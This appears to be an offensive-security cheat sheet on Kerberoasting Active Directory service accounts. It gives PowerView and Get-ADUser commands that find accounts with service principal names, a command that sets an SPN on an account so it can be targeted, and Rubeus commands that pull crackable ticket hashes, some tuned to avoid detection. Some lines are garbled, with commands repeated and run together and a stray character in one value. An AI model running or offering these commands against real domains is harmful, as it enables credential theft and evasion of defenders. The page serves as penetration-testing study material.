Kerberoast
SPNs
Find SPNs
Get-DomainUser -SPNGet-ADUser -Filter {Servicer -Filter {ServicePrincipalName -ne "$null"} - Properties ServicePrincipalNameGet-ADUser -Filter {ServicePrincipalName -ne "$null"} - Properties ServicePrincipalNameGet-ADUser -Filter {ServicePrincipalName -ne "$null"} - Properties ServicePrincipalNameSet SPNs
# Find Permissions - for example RDPUsers group
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}
# Set SPN
Set-DomainObject -Identity support1user -Set @{serviceprincipalname=βdcorp/whatever1'}
TGS
# try to downgrade to RC4-HMAC and get hashes
Rubeus.exe kerberoast
# to avoid detections look for Kerberoastable accounts that only support RC4_HMAC
Rubeus.exe kerberoast /rc4opsec
# Specific SPN - more stealth
Rubeus.exe kerberoast /user:svcadmin /rc4opsec
# usefull flags
/outfile:hashes.txt # output the hashes into file
/simple # hashes are output in the console one per line
/nowrap # results will not be line wrapped
/stats # will output statistics about kerberoastable users foundCrack
Last updated